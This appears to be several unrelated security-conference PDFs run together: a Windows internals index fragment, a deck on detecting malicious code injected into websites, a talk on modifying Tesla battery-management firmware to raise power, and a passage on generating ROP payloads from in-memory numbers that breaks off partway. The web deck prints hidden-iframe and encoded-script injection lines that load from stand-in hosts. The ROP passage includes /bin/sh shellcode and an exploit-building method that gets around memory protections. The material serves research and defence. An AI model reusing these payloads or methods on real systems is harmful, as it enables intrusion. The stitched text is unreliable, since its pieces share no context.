DTrace (dynamic tracing); ETW (Event
Tracing for Windows)
transaction support, NTFS on-disk structure,
688–689
transactional APIs, NTFS on-disk structure, 690
transactions
committing, 697
undoing, 702
transition stack, 18
trap dispatching
exception dispatching, 85–91
interrupt dispatching, 32–50
line-based interrupts, 50–66
message signaled-based interrupts, 50–66
trap dispatching (continued)
overview, 30–32
system service handling, 91–104
system worker threads, 81–85
timer processing, 66–81
TRIM commands, 645
troubleshooting Windows loader issues,
556–557
!trueref debugger command, 148
trusted execution, 805–807
trustlets
creation, 372–375
debugging, 374–375
secure devices, 376–378
Secure Kernel and, 345
secure system calls, 354
VBS-based enclaves, 378
in VTL 1, 371
Windows hypervisor on ARM64, 314–315
TSS (Task State Segment), 6–9
.tss command, 8
tunneling, NTFS on-disk structure, 666–667
TxF APIs, 688–690
$TXF_DATA attribute, 691–692
TXT (Trusted Execution Technology), 801,
805–807, 816
type initializer fields, 139–140
type objects, 131, 136–140
U
UBPM (Unified Background Process Manager),
481–486
UDF (Universal Disk Format), 603
UEFI boot, 777–781
UEFI runtime virtualization, 358–363
UMDF (User-Mode Driver Framework), 209
\UMDFCommunicationPorts directory, 161
undo pass, NTFS recovery support, 701–703
unexpected traps, 31
Unicode-based names, NTFS, 633
user application crashes, 537–542
User page tables, 18
UserApcReserve object, 130
user-issued system call dispatching, 98
user-mode debugging. See also debugging;
GDI/User objects
kernel support, 239–240
native support, 240–242
Windows subsystem support, 242–243
user-mode resources, 205
UWP (Universal Windows Platform)
and application hives, 402
application model, 244
bundles, 265
and SEB (System Event Broker), 238
services to apps, 243
UWP applications, 245–246, 259–260
V
VACBs (virtual address control blocks), 572,
576–578, 581–582
VBO (virtual byte offset), 589
VBR (volume boot record), 657
VBS (virtualization-based security)
detecting, 344
overview, 340
VSM (Virtual Secure Mode), 340–344
VTLs (virtual trust levels), 340–342
VCNs (virtual cluster numbers), 656–658,
669–672
VHDPMEM image, creating and mounting,
737–739
virtual block caching, 569
virtual PMs architecture, 736
virtualization stack
deferred commit, 339
EPF (enlightened page fault), 339
explained, 269
hardware support, 329–335
hardware-accelerated devices, 332–335
memory access hints, 338
memory-zeroing enlightenments, 338
overview, 315
paravirtualized devices, 331
ring buffer, 327–329
VA-backed virtual machines, 336–340
VDEVs (virtual devices), 326–327
VID driver and memory manager, 317
VID.sys (Virtual Infrastructure Driver), 317
virtual IDE controller, 330
VM (virtual machine), 318–322
VM manager service and worker processes,
315–316
VM Worker process, 318–322, 330
VMBus, 323–329
VMMEM process, 339–340
Vmms.exe (virtual machine manager ser-
vice), 315–316
VM (View Manager), 244
VMENTER event, 268
VMEXIT event, 268, 330–331
\VmSharedMemory directory, 161
VMXROOT mode, 268
volumes. See also tiered volumes
caching and file systems, 565–566
defined, 565–566
NTFS on-disk structure, 655
setting repair options, 706
VSM (Virtual Secure Mode)
overview, 340–344
startup policy, 813–816
system calls, 349–355
VTLs (virtual trust levels), 340–342
W
wait block states, 186
wait data structures, 189
Wait for a single object service, 136
Wait for multiple objects service, 136
wait queues, 190–194
WaitCompletionPacket object, 130
wall time, 57
Wbemtest command, 491
Wcifs (Windows Container Isolation minifilter
driver), 248
Wcnfs (Windows Container Name
Virtualization minifilter driver), 248
WDK (Windows Driver Kit), 392
WER (Windows Error Reporting)
ALPC (advanced local procedure call), 209
AeDebug and AeDebugProtected root
keys, 540
crash dump files, 543–548
crash dump generation, 548–551
crash report generation, 538–542
dialog box, 541
Fault Reporting process, 540
implementation, 536
kernel reports, 551
kernel-mode (system) crashes, 543–551
overview, 535–537
process hang detection, 551–553
registry settings, 539–540
snapshot creation, 538
user application crashes, 537–542
user interface, 542
Windows 10 Creators Update (RS2), 571
Windows API, executive objects, 128–130
Windows Bind minifilter driver (BindFlt), 248
Windows Boot Manager, 785–799
BCD objects, 798
\Windows directory, 161
Windows hypervisor. See also Hyper-V
schedulers
address space isolation, 282–285
AM (Address Manager), 275, 277
architectural stack, 268
on ARM64, 313–314
boot virtual processor, 277–279
child partitions, 269–270, 323
dynamic memory, 285–287
emulation of VT-x virtualization extensions,
309–310
enlightenments, 272
Windows hypervisor (continued)
execution vulnerabilities, 282
Hyperclear mitigation, 283
intercepts, 300–301
memory manager, 279–287
nested address translation, 310–313
nested virtualization, 307–313
overview, 267–268
partitions, processes, threads, 269–273
partitions physical address space, 281–282
PFN database, 286
platform API and EXO partitions, 304–305
private address spaces/memory zones, 284
process data structure, 271
processes and threads, 271
root partition, 270, 277–279
SLAT table, 281–282
startup, 274–279
SynIC (synthetic interrupt controller),
301–304
thread data structure, 271
VAL (VMX virtualization abstraction layer),
274, 279
VID driver, 272
virtual processor, 278
VM (Virtualization Manager), 278
VM_VP data structure, 278
VTLs (virtual trust levels), 281
Windows hypervisor loader (Hvloader), BCD
options, 796–797
Windows loader issues, troubleshooting,
556–557
Windows Memory Diagnostic Tool, 845
Windows OS Loader, 792–796, 808–810
Windows PowerShell, 774
Windows services
accounts, 433–446
applications, 426–433
autostart startup, 451–457
boot and last known good, 460–462
characteristics, 429–433
Clipboard User Service, 472
control programs, 450–451
delayed autostart, 457–458
failures, 462–463
groupings, 466
interactive services/session 0 isolation,
444–446
local service account, 436
local system account, 434–435
network service account, 435
packaged services, 473
process, 428
protected services, 474–475
Recovery options, 463
running services, 436
running with least privilege, 437–439
SCM (Service Control Manager), 426, 446–450
SCP (service control program), 426
Service and Driver Registry parameters,
429–432
service isolation, 439–443
Service SIDs, 440–441
shared processes, 465–468
shutdown, 464–465
startup errors, 459–460
Svchost service splitting, 467–468
tags, 468–469
triggered-start, 457–459
user services, 469–473
virtual service account, 443–444
window stations, 445
Windows threads, viewing user start address
for, 89–91. See also thread-local register
effect
WindowStation object, 129
Wininit, 831–835
Winload, 792–796, 808–810
Winlogon, 831–834, 838
WinObjEx64 tool, 125
WinRE (Windows Recovery Environment),
845–846. See also recovery
WMI (Windows Management Instrumentation)
architecture, 487–488
CIM (Common Information Model),
488–495
class association, 493–494
Control Properties, 498
DMTF, 486, 489
implementation, 496–497
Managed Object Format Language,
489–495
MOF (Managed Object Format), 488–495
namespace, 493
ODBC (Open Database Connectivity), 488
overview, 486–487
providers, 488–489, 497
scripts to manage systems, 495
security, 498
System Control commands, 497
WmiGuid object, 130
WmiPrvSE creation, viewing, 496
WNF (Windows Notification Facility)
event aggregation, 237–238
features, 224–225
publishing and subscription model, 236–237
state names and storage, 233–237
users, 226–232
WNF state names, dumping, 237
wnfdump command, 237
WnfDump utility, 226, 237
WoW64 (Windows-on-Windows)
ARM, 113–114
ARM32 simulation on ARM 64 platforms, 115
core, 106–109
debugging in ARM64, 122–124
exception dispatching, 113
file system redirection, 109–110
memory models, 114
overview, 104–106
registry redirection, 110–111
system calls, 112
user-mode core, 108–109
X86 simulation on AMD64 platforms, 759–751
X86 simulation on ARM64 platforms, 115–125
write throttling, 596–597
write-back caching and lazy writing, 589–595
write-behind and read-ahead. See read-ahead
and write-behind
WSL (Windows Subsystem for Linux), 64, 128
X
x64 systems, 2–4
viewing GDT on, 4–5
viewing TSS and IST on, 8–9
x86 simulation in ARM64 platforms, 115–124
x86 systems, 3, 35, 94–95, 101–102
exceptions and interrupt numbers, 86
Retpoline code sequence, 23
viewing GDT on, 5
viewing TSSs on, 7–8
XML descriptor, Task Scheduler, 479–481
XPERF tool, 504
XTA cache, 118–120 | pdf |
Web Security Threat Detection and Protection
Roger Chiu (邱春樹)
Malware-Test Lab
http://www.malware-test.com
Training Outline
• Related news reports
• Demonstration of websites injected with malicious code
• The 2007 OWASP Top 10 Web security vulnerabilities
• Techniques used to inject malicious code into websites
• Detecting malicious code injected into websites
• Protecting against malicious code injected into websites
• Conclusion
Related News Reports
• May 21, 2007: a Google research report found that one in ten websites worldwide harbors malicious links or code. These sites carry "drive-by download" malware.
Demonstration of Websites Injected with Malicious Code
• Live demonstration (DEMO) of real-world Web security threats
The 2007 OWASP Top 10 Web Security Vulnerabilities
• Cross-Site Scripting (XSS)
• Injection Flaws
• Malicious File Execution
• Insecure Direct Object Reference
• Cross-Site Request Forgery (CSRF)
• Information Leakage and Improper Error Handling
• Broken Authentication and Session Management
• Insecure Cryptographic Storage
• Insecure Communication
• Failure to Restrict URL Access
OWASP Web Security Vulnerabilities Related to Code Security Quality
• Cross-Site Scripting (XSS)
• Injection Flaws
• Malicious File Execution
• Insecure Direct Object Reference
• Cross-Site Request Forgery (CSRF)
Techniques Used to Inject Malicious Code into Websites
• iframe syntax:
<iframe src=[trojan URL] width=0 height=0></iframe>
• Example
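A defender can flag this hidden-iframe pattern with a simple text scan of the served page. A minimal sketch in Python, assuming the HTML has already been fetched (the regex and sample page are illustrative, not a production scanner):

```python
import re

# Flag iframes whose width and height are both zero, in either attribute
# order -- the classic drive-by-download injection shown on this slide.
HIDDEN_IFRAME = re.compile(
    r"<iframe[^>]*(?:width\s*=\s*['\"]?0['\"]?[^>]*height\s*=\s*['\"]?0['\"]?"
    r"|height\s*=\s*['\"]?0['\"]?[^>]*width\s*=\s*['\"]?0['\"]?)[^>]*>",
    re.IGNORECASE,
)

def find_hidden_iframes(html):
    """Return every zero-size <iframe> tag found in the page source."""
    return HIDDEN_IFRAME.findall(html)

page = '<html><iframe src="http://example/mal" width=0 height=0></iframe></html>'
print(find_hidden_iframes(page))
```

Attackers vary quoting, attribute order, and encoding, so in practice this kind of signature is only a first-pass check.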
Techniques Used to Inject Malicious Code into Websites
• JavaScript syntax:
document.write("<iframe width='0' height='0' src='[trojan URL]'></iframe>");
• Example (content encoded/encrypted)
Techniques Used to Inject Malicious Code into Websites
• VBScript syntax
• Example (content encoded/encrypted)
Techniques Used to Inject Malicious Code into Websites
• JavaScript encoded (obfuscated) syntax:
<SCRIPT language="JScript.Encode" src=http://example/malware.txt></script>
* malware.txt can be renamed to any file extension
Techniques Used to Inject Malicious Code into Websites
• Media file (e.g., RM, SWF, WMV) syntax
Techniques Used to Inject Malicious Code into Websites
• Malformed ASCII bypassing technique
Techniques Used to Inject Malicious Code into Websites
• Microsoft Security Bulletin MS07-017: Vulnerabilities in GDI Could Allow Remote Code Execution (925902)
• Microsoft Security Advisory (935423): Vulnerability in Windows Animated Cursor Handling
Detecting Malicious Code Injected into Websites
• [Figure omitted] In the figure, the detection point is the moment at which antivirus/security software is able to detect these threats
Detecting Malicious Code Injected into Websites
• Almost no security software or appliance can detect these threats effectively at the moment they first appear
Detecting Malicious Code Injected into Websites
• Use antivirus software
• Use a firewall
• Use an intrusion detection system (IDS)
• Use an intrusion prevention system (IPS)
• Use MD5 to compare the integrity of files in use against the originals
• Behavior-based detection has become the mainstream antivirus protection technique (similar to the UAC feature in Windows Vista)
  • http://rogerspeaking.blogspot.com/2007/09/blog-post_3909.html
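The MD5 file-integrity check mentioned above can be sketched with the Python standard library; the baseline digest would in practice be recorded while the site is known to be clean, then compared against the file currently being served:

```python
import hashlib

def md5_hex(data):
    """MD5 hex digest of a file's contents (passed here as bytes)."""
    return hashlib.md5(data).hexdigest()

# Baseline recorded when the page was known-clean.
baseline = md5_hex(b"<html>original page</html>")

# Later, the page currently being served is hashed and compared;
# any injected iframe changes the digest.
current = md5_hex(
    b"<html>original page</html><iframe src=evil width=0 height=0></iframe>"
)
print("tampered" if current != baseline else "clean")  # → tampered
```

MD5 is fine for detecting accidental or casual tampering, though a modern deployment would prefer SHA-256 since MD5 collisions are practical.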
Protecting Against Malicious Code Injected into Websites
• Install patches (operating system, applications, ...)
• Use antivirus software
• Use behavior-based detection software (less suitable for gateway- or server-side antivirus/security products)
• Do not browse websites indiscriminately
• Maintain a website blacklist (the most accurate detection method)
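The blacklist approach from the last bullet can be as simple as a set lookup on the URL's host name. A minimal sketch; the blacklist entries here are hypothetical, and a real deployment would load a regularly updated feed rather than a hard-coded set:

```python
from urllib.parse import urlsplit

# Hypothetical known-malicious hosts (illustrative only).
BLACKLIST = {"malware-host.example", "trojan.example.net"}

def is_blacklisted(url):
    """True when the URL's host name (ignoring port and path) is listed."""
    host = urlsplit(url).hostname or ""
    return host.lower() in BLACKLIST

print(is_blacklisted("http://malware-host.example/payload.txt"))  # → True
print(is_blacklisted("http://www.malware-test.com/"))             # → False
```

Matching on the exact host is the simplest policy; production blacklists also match parent domains and URL patterns.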
Conclusion
• The Internet is like a tiger's den; danger lurks everywhere
• Even well-known websites can be harmful (many recent reports, e.g., PTT and Hinet)
• Users must raise their risk awareness
• Users must hold correct security concepts; otherwise, the next victim could be you
• The importance of enterprises cultivating security professionals
• The importance of security-awareness training for ordinary users
Contact
• Email: [email protected]
• Malware-Test Lab: http://www.malware-test.com
• "大砲開講" blog: http://rogerspeaking.com
Reverse Engineering the Tesla
Battery Management System to
Increase Power Available
Patrick Kiley
Patrick Kiley – Principal Security Consultant - Rapid7
• Member of the Penetration Testing team at
Rapid7
• Performed research in avionics security and Internet-connected transportation platforms
• Experience in hardware hacking, IoT,
Autonomous Vehicles, and CAN bus.
Topics
• Architecture of the Model S and Battery Management System (BMS)
• Performance and Ludicrous timeline
• Hardware changes
• Data stored in toolbox
• Firmware changes
• Shunt modification
• Upgrade process
• Failure and what I learned
• Next steps
Model S Architecture
• Central Information Display (CID):
Nvidia Tegra based
• Gateway: a security component, stores
vehicle configuration, sits between the
various CAN buses and the CID
• Powertrain (PT) CAN bus, contains the
BMS, Drive units, charging, thermal
control and other powertrain related
controllers
• PT CAN runs at 500 kBit/sec and is a
standard vehicle CAN bus (differential
signaling, 11 bit arb ids, etc)
• PT CAN supports UDS standard.
BMS Overview
• TI TMS320C2809 – Main microprocessor
• Altera CPLD – Hardware backup for TMS320
• Current Shunt with STM8, measures current coming from the battery
• Precharge Resistor, prevents inrush current damage
• BMB boards on each battery pack, these include bleed resistors to balance
packs
All the firmware changes are on the TMS320
Some settings are changed on the shunt; in addition, it has a small physical
modification
Full reversing of all the components is an ongoing project, so if you want to
help, I am lacking in some of the skill areas.
BMS with Components
Ludicrous History
• P85D announced on Oct 10, 2014
• Ludicrous announced on July 17, 2015
• 10K for new buyers, 5K for existing P85D owners
• Upgrade involved new contactors and pyro fuse
• Many performance battery packs would come standard with new components
• They were “ludicrous capable”,
• All 100kWh performance battery packs are “ludicrous capable”
• Ludicrous capable means add “performanceaddon 1” to single file, internal.dat on the gateway
I Upgraded a Donor Vehicle
Pack Dropped
Fuse and Contactor Bay
Shunt and Contactor Close Up
What about Firmware?
• For this we need to dig into some python
• Tesla makes a diagnostic tool called toolbox, runs on
windows, uses encrypted and compiled python
modules.
• The important files are contained as individual plugins
with the .scramble extension.
• All of the information needed to decrypt the scramble
files are on a machine that is running toolbox.
• Some of these scramble files include firmware as well
as many other useful items.
• Once decrypted, we can use Uncompyle6 to give us
source code
• Tesla left all the source code comments in place.
Thank you!
Toolbox Uncompyled
Helpful Comments
Data Structures – Extract and Binwalk
Bootloader
• We already know from the
donor vehicle’s config that
it had a pack id of “57”
• These are the files we need
from the extracted
firmware
• Pack id 57 becomes pack id
70 after the changes
Firmware Upgrade
• All the instructions and files needed for the upgrade
process were stored in Toolbox files
• DBC files to help understand signals on the PT CAN
bus, stored in python pickle format
• ODX files that defined how to calibrate the shunt,
grant security access and upgrade the firmware
• Files that stored calibration data and firmware in
python pickle format
• Text comments and text data structures that
offered clues on the process
CAN and UDS
Sitting on top of the CAN network stack is a protocol called
UDS, or “Unified Diagnostic Services”, this protocol can be
used to help technicians:
• Diagnose problems
• Read values from sensors
• Update firmware
CAN networks use a descriptor file called a DBC file
UDS networks can use a scripting file called ODX or GMD
Used commercial tool Vehicle Spy to assist in the research
ARBS 7E2 and 202 from BMS identify max current as a static
value
232 (BMS), 266 (DI) and 2E5 (DIS), identify max power in
watts, which varies based on SOC, temp, and power
recently used
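The UDS requests described above travel in 8-byte CAN frames using ISO-TP framing. As a rough illustration (the ReadDataByIdentifier service 0x22 and DID 0xF190 below are generic examples, not values taken from the talk), a single-frame request can be built by hand:

```python
def uds_single_frame(service, payload, padding=0x00):
    """Build an 8-byte ISO-TP single-frame payload for a UDS request.

    Byte 0 is the PCI byte: high nibble 0x0 (single frame),
    low nibble = number of UDS bytes that follow.
    """
    data = bytes([service]) + bytes(payload)
    if len(data) > 7:
        raise ValueError("a single frame carries at most 7 UDS bytes")
    frame = bytes([len(data)]) + data
    # Pad to the full 8-byte CAN data field.
    return frame + bytes([padding]) * (8 - len(frame))

# ReadDataByIdentifier (0x22) for DID 0xF190, as might be sent to an
# arbitration id such as 0x7E2 on the powertrain bus:
request = uds_single_frame(0x22, [0xF1, 0x90])
```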
DBC Turns This
Into This
ODX Routines for Shunt Calibration
Shunt Modification
• Shunt also needed a hardware modification
• Single wire connecting the shunt to the CPLD.
• If this wire remained connected after the firmware update then
the BMS would generate an alert and refuse to close the
contactors.
• Discovered by running through the upgrade process on a bench version
of the components.
• Made a breakout board to monitor the signals from the shunt.
• This also meant that the hardware and firmware both had to be
updated before the car was driven
Upgrade Process
•
Had access to garage and lift in Southern California
•
Drove there to do upgrade, arrive with low SOC
•
Drop pack, do hardware stuff
•
Reinstall pack, carefully (image is from borescope)
•
Flash BMS with special firmware for shunt
modification
•
Flash BMS to new packID
•
Update internal.dat to add ludicrous and change
packID
•
Redeploy firmware due to changed battery packID
•
Drive away and enjoy the ridiculous amount of
torque?
Final Steps
•
Using known techniques that I have used before,
I tried to redeploy the firmware, also tried to
upgrade since I had access to several versions
•
The car failed using every method I tried.
•
Had to Tow the car from Rancho Cucamonga to
Las Vegas so I could continue to work on it.
•
Cost me $360 or 3.6 hundred dollars, not great,
not terrible right?
Learned Something Cool
•
Gateway uses a file called firmware.rc
•
Gateway uses this as a validation check for the
components
•
Calculated during upgrade/redeploy
•
When the BMS changed, so did its CRC
•
Changed the CRC based on CAN and value from
“signed_metadata_map.tsv”
•
Final CRC line is a JAMCRC based on overall file
•
Car woke up, errors cleared and car could be
driven.
•
Eventually figured out the reason for the earlier
failure.
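The JAMCRC mentioned above is ordinary CRC-32 without the final bit inversion, so it can be derived directly from Python's zlib (a sketch of the checksum itself; the exact bytes fed into it for firmware.rc are not reproduced here):

```python
import zlib

def jamcrc(data: bytes) -> int:
    """CRC-32/JAMCRC: same polynomial and reflection as zlib's CRC-32,
    but without the final XOR with 0xFFFFFFFF."""
    return zlib.crc32(data) ^ 0xFFFFFFFF
```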
Power Before and After Upgrade
•
Before Upgrade
•
1300 Amps
•
After Upgrade
•
1500 Amps
•
Actual Available
•
Why Lower?
Further Research
•
TMS320F2809 is supported in IDA Pro
•
ARBS 7E2 and 202 define max current
•
Seems possible to increase speed beyond ludicrous, it has been done by others (1000 HP RWD P85)
•
Just need to find the variables and “bump them up a bit”, also might need to modify DU firmware
•
Could be dangerous to do so, ludicrous drain is already 20A/cell or ~6.6C for you RC hobbyists
•
Could end up burning out the Drive unit IGBTs or battery pack, or worse, cause a fire.
•
Still it would be interesting to reverse engineer, hit me up if you would like to assist, I have a dug a lot
deeper than the information I am presenting here
•
Would like to understand shunt parameters CAU1, CGI1
•
Check out Car Hacking Village talk for deep dive into many of these techniques, some analysis of the
firmware and where we can take this project from here
Referenced Material, Acknowledgements
•
Spaceballs movie, inspiration for Tesla Ludicrous https://www.imdb.com/title/tt0094012/
•
P85D announcement https://www.tesla.com/blog/dual-motor-model-s-and-autopilot
•
Ludicrous announcement and P85D upgrade offer https://www.tesla.com/blog/three-dog-day
•
What is a current shunt? https://youtu.be/j4u8fl31sgQ (electroboom)
•
TMS320 datasheet https://www.ti.com/product/TMS320F2809
•
Intrepid Control Systems, makers of Vehicle Spy software https://intrepidcs.com/
•
Bitbuster, for allowing use of lift and garage
•
The people who helped with the Toolbox reversing, you know who you are
•
Tesla security team for letting me do this talk.
Thank You.
Email [email protected] or visit http://rapid7.com | pdf |
Stitching numbers
Alex Moneger
Security Engineer
10th of August 2014
Generating ROP payloads from in memory numbers
Cisco Confidential
© 2013-2014 Cisco and/or its affiliates. All rights reserved.
! Work for Cisco Systems
! Security engineer in the Cloud Web Security Business Unit (big cloud
based security proxy)
! Interested mostly in bits and bytes
! Disclaimer: research… own time… my opinions… not my employers
Who am I?
1. Brief ROP overview
2. Automating ROP payload generation
3. Number Stitching
1.
Goal
2.
Finding gadgets
3.
Coin change problem
4. Pros, Cons, Tooling
5. Future Work
Agenda
Introduction
! Use only gadgets generated by libc or compiler stubs. In short,
target the libc or compiler gadgets instead of the binary ones
! Generate payloads using numbers found in memory
! Solve the coin change problem to automatically generate ROP
payloads
! Automate the payload generation
TL;DR
ROP overview
! Re-use instructions from the vulnerable binary
! Control flow using the stack pointer
! Multi-staged:
1. Build the payload in memory using gadgets
2. Transfer execution to generated payload
! Only way around today’s OS protections (let aside home routers,
embedded systems, IoT, …)
Principle
! Useful instructions => gadgets
! Disassemble backwards from “ret” instruction
! Good tools available
! Number of gadgets to use is dependent upon target binary
Finding instructions
! Once payload is built in memory
! Transfer control by “pivoting” the stack
! Allows to redirect execution to a stack crafted by the attacker
! Useful gadgets:
! leave; ret
! mv esp, addr; ret
! add esp, value; ret
Transfer control to payload
Automating payload generation
! Find required bytes in memory
! Copy them to a controlled stack
! Use either:
! A mov gadget (1, 2 or 4 bytes)
! A copy function if available (strcpy, memcpy, …) (variable byte length)
Classic approach
! Availability of a mov gadget
! Can require some GOT dereferencing
! Availability of some bytes in memory
! May require some manual work to get the missing bytes
Potential problems
! Shellcode requires “sh” (\x73\x68)
! Got it! What about “h/” (\x68\x2f)?
Finding bytes
someone@something:~/somewhere$ sc="\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80"
someone@something:~/somewhere$ ROPgadget abinary -opcode "\x73\x68"
Gadgets information
============================================================
0x08048321: "\x73\x68"
someone@something:~/somewhere$ hexdump -C abinary.text | egrep --color "73(\s)*68"
00000320  75 73 68 00 65 78 69 74  00 73 74 72 6e 63 6d 70  |ush.exit.strncmp|
someone@something:~/somewhere$ hexdump -C hbinary5-mem.txt | egrep --color "68(\s)*2f"
someone@something:~/somewhere$
! Very small binaries do not tend to have many mov gadgets
! In the case of pop reg1; mov [ reg2 ], reg1:
! Null byte can require manual work
mov gadget
Number stitching
! Is exploiting a “hello world” type vulnerability possible with:
! RELRO
! X^W
! ASLR
! Can the ROP payload be built only from libc/compiler introduced
stubs?
! In other words, is it possible not to use any gadgets from the target
binary code to build a payload?
Initial problem
Program anatomy
! What other code surrounds the “hello world” code?
! Does libc add anything at link time?
Libc static functions
someone@something:~/somewhere$ pygmentize abinary.c
#include <stdio.h>

int main(int argc, char **argv, char** envp) {
    printf("Hello Defcon!!\n");
}
someone@something:~/somewhere$ objdump -d -j .text -M intel abinary | egrep '<(.*)>:'
08048510 <_start>:
080489bd <main>:
080489f0 <__libc_csu_fini>:
08048a00 <__libc_csu_init>:
08048a5a <__i686.get_pc_thunk.bx>:
! At link time “libc.so” is used
! That’s a script which both dynamically and statically links libc:
! Looks libc_nonshared.a statically links some functions:
Where does this come from?
someone@something:~/somewhere$ cat libc.so
/* GNU ld script
   Use the shared library, but some functions are only in
   the static library, so try that secondarily.  */
OUTPUT_FORMAT(elf32-i386)
GROUP ( /lib/i386-linux-gnu/libc.so.6 /usr/lib/i386-linux-gnu/libc_nonshared.a  AS_NEEDED ( /lib/i386-linux-gnu/ld-linux.so.2 ) )
! Quite a few functions are:
What is statically linked?
someone@something:~/somewhere$ objdump -d -j .text -M intel /usr/lib/i386-linux-gnu/libc_nonshared.a | egrep '<*>:'
00000000 <__libc_csu_fini>:
00000010 <__libc_csu_init>:
00000000 <atexit>:
00000000 <at_quick_exit>:
00000000 <__stat>:
00000000 <__fstat>:
00000000 <__lstat>:
00000000 <stat64>:
00000000 <fstat64>:
00000000 <lstat64>:
00000000 <fstatat>:
00000000 <fstatat64>:
00000000 <__mknod>:
00000000 <mknodat>:
00000000 <__warn_memset_zero_len>:
00000000 <__stack_chk_fail_local>:
! Those functions are not always included
! Depend on compile options (-fstack-protector, …)
! I looked for gadgets in them.
! Fail…
Gadgets in static functions
Anything else added?
! Is there anything else added which is constant:
! get_pc_thunk.bx() used for PIE, allows access to GOT
! _start() is the “real” entry point of the program
! There are also a few “anonymous” functions (no symbols)
introduced by gcc.
! Those functions relate to profiling
! Profiling is surprisingly on by default on some distros. To check
default compiling options: cc –Q –v.
! Look for anything statically linking
! This work was done on gcc 4.4.5
! Looking for gadgets in that, yields some results!
Static linking
! What I get to work with:
1. Control of ebx in a profiling function: pop ebx ; pop ebp ;;
2. Stack pivoting in profiling function: leave ;;
3. Write to mem in profiling function: add [ebx+0x5d5b04c4] eax ;;
4. Write to reg in profiling function: add eax [ebx-0xb8a0008] ; add esp 0x4 ; pop ebx ; pop ebp ;;
! In short, attacker controls:
! ebx
! That’s it…
! Can anything be done to control the value in eax?
Useful gadgets against gcc 4.4.5
Shellcode to numbers
! Useful gadget: add eax [ebx-0xb8a0008] ; (removed trailing junk)
! We control ebx, so we can add arbitrary memory with eax
! Is it useful?
! Yes, let’s come back to this later
Accumulating
! Useful gadget: add [ebx+0x5d5b04c4] eax ;;
! Ebx is under attacker control
! For the time being, assume we control eax
! Gadget allows to add a value from a register to memory
! If attacker controls eax in someway, this allows to write anywhere
! Use this in order to dump a value to a custom stack
Dumping
! Choose a spot in memory to build a stack:
! .data section is nice
! must be a code cave (mem spot with null bytes), since we are performing
add operations
! Choose a shellcode to write to the stack:
! As an example, use a setreuid shellcode
! Nothing unusual in all this
Approach
1. Next, cut the shellcode into 4 byte chunks
2. Interpret each chunk as an integer
3. Keep track of the index of each chunk position
4. Order them from smallest to biggest
5. Compute the difference between chunks
6. There is now a set of monotonically increasing values representing
the shellcode
Chopping shellcode
Visual chopping

Shellcode bytes:   \x04\x03\x02\x01   \x08\x07\x06\x05   \x0d\x0c\x0b\x0a
Chunks (index):    1: 0x01020304      2: 0x05060708      3: 0x0a0b0c0d
Deltas (sorted, increasing):
  0x01020304                               (chunk 1)
  0x04040404 = 0x05060708 - 0x01020304    (chunk 2)
  0x05050505 = 0x0a0b0c0d - 0x05060708    (chunk 3)
The shellcode is now a monotonically increasing set of deltas.
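The chopping and delta steps above are straightforward to express in Python. The sketch below reproduces the slide's example and also shows the reverse (accumulate-and-dump) direction that the add gadgets perform in memory:

```python
import struct

def shellcode_to_deltas(sc):
    """Split shellcode into little-endian 32-bit chunks, sort them,
    and return (deltas, order): order[i] is the original chunk index."""
    padded = sc.ljust(-(-len(sc) // 4) * 4, b"\x90")  # pad to 4 bytes with NOPs
    chunks = [struct.unpack("<I", padded[i:i + 4])[0]
              for i in range(0, len(padded), 4)]
    order = sorted(range(len(chunks)), key=lambda i: chunks[i])
    deltas, prev = [], 0
    for i in order:
        deltas.append(chunks[i] - prev)
        prev = chunks[i]
    return deltas, order

def rebuild(deltas, order, size):
    """Reverse process: accumulate each delta and dump the running sum
    at its original chunk index (what the add gadgets do in memory)."""
    out, acc = bytearray(size), 0
    for delta, i in zip(deltas, order):
        acc += delta
        out[i * 4:(i + 1) * 4] = struct.pack("<I", acc)
    return bytes(out)
```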
! Shellcode is represented as increasing deltas
! Add delta n with n+1
! Dump that delta at stack index
! Repeat
! We’ve copied our shellcode to our stack
Reverse process
1.
Find address of number 0x01020304 in memory
2.
Load that address into ebx
3.
Add mem to reg. Eax contains 0x01020304
4.
Add reg to mem at index 3. Fake stack contains “\x04\x03\x02\x01”
5.
Find address of number 0x04040404 in memory and load into ebx
6.
Add mem to reg. Eax contains 0x01020304 + 0x04040404 = 0x05060708
7.
Add reg to mem. Fake stack contains “\x08\x07\x06\x05\x04\x03\x02\x01”
8.
Repeat
Example
! How easy is it to find the shellcode “numbers” in memory?
! Does memory contain numbers such as:
! 0x01020304
! "\x6a\x31\x58\x99” => 0x66a7ce96 (string to 2’s complement integer)
! If not, how can we build those numbers to get our shellcode?
Problem
Stitching numbers
! It’s not easy to find “big” numbers in memory
! Shellcode chunks are big numbers
! Example: looking for 0x01020304:
! In short, not many large numbers in memory
Answers
someone@something:~/somewhere$ gdb hw
gdb-peda$ peda searchmem 0x01020304 .text
Searching for '0x01020304' in: .text ranges
Not found
! Scan memory regions in ELF:
! RO segment (contains .text, .rodata, …) is a good candidate:
! Read only so should not change at runtime
! If not PIE, addresses are constant
! Keep track of all numbers found and their addresses
! Find the best combination of numbers which add up to a chunk
Approach
! This is called the coin change problem
! If I buy an item at 4.25€ and pay with a 5€ note
! What’s the most e"cient way to return change?
! 0.75€ change:
! 1 50 cent coin
! 1 20 cent coin
! 1 5 cent coin
Coin change problem
! In dollars, answer is different
! 0.75$:
! 1 half-dollar coin
! 1 quarter
! Best solution depends on the coin set
! Our set of coins are the numbers found in memory
In hex you’re a millionaire
! Ideal solution to the problem is using Dynamic Programming:
! Finds most e"cient solution
! Blows memory for big numbers
! I can’t scale it for big numbers yet
! Sub-optimal solution is the greedy approach:
! No memory footprint
! Can miss the solution
! Look for the biggest coin which fits, then go down
! Luckily small numbers are easy to !nd in memory, meaning greedy will
always succeed
Solving the problem
! 75 cents change example:
! Try 2 euros
✖
! Try 1 euro
✖
! Try 50 cents
✔#
! Try 20 cents
✔#
! Try 10 cents
✖
! Try 5 cents
✔
! Found solution:
Greedy approach
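A minimal sketch of this greedy approach in Python (ropnum's coin set is the list of numbers found in memory, and each coin may be reused, since a memory address can be added more than once):

```python
def greedy_change(target, coins):
    """Greedy coin change: repeatedly take the largest coin that still
    fits. Fast and memory-free, but may miss solutions an exhaustive
    (dynamic-programming) search would find."""
    picks, remaining = [], target
    for coin in sorted(set(coins), reverse=True):
        while coin <= remaining:
            picks.append(coin)
            remaining -= coin
    return picks if remaining == 0 else None

# 0.75 euro with euro coins (values in cents), as in the slide:
assert greedy_change(75, [200, 100, 50, 20, 10, 5, 2, 1]) == [50, 20, 5]
```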
